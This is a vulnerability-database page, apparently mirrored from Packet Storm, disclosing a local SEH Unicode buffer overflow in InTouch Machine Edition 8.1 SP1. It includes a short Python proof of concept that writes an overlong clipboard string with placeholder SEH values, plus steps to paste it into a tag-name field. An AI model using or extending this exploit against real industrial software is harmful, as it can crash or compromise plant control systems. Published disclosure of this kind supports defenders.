Lucene search
K

InTouch Machine Edition 8.1 SP1 Buffer Overflow

🗓️ 12 Sep 2018 00:00:00Reported by Luis MartinezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

InTouch Machine Edition 8.1 SP1 Buffer Overflow discovered by Luis Martinez in 2018. Vulnerability type: Local Buffer Overflow (SEH Unicode) on Windows 10 Pro x64

Code
`# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)  
# Discovery by: Luis Martinez  
# Discovery Date: 2018-09-10  
# Vendor Homepage: https://on.wonderware.com/  
# Software Link: https://on.wonderware.com/intouch-machine-edition  
# Tested Version: 8.1 SP1  
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)  
# Tested on OS: Windows 10 Pro x64 en  
  
# Steps to Produce the Local Buffer Overflow (SEH Unicode):   
# 1.- Run python code: InTouch_Machine_Edition_8.1.py  
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard  
# 3.- Open ITME v8.1 InTouch Machine Edition  
# 4.- Inicio  
# 5.- Paste ClipBoard on "Nombre del Tag"  
  
#!/usr/bin/env python  
  
nSEH = "\x42\x42"  
SEH = "\x43\x43"  
  
buffer = "\x41" * 1042 + nSEH + SEH  
f = open ("InTouch_Machine_Edition_8.1.txt", "w")  
f.write(buffer)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
29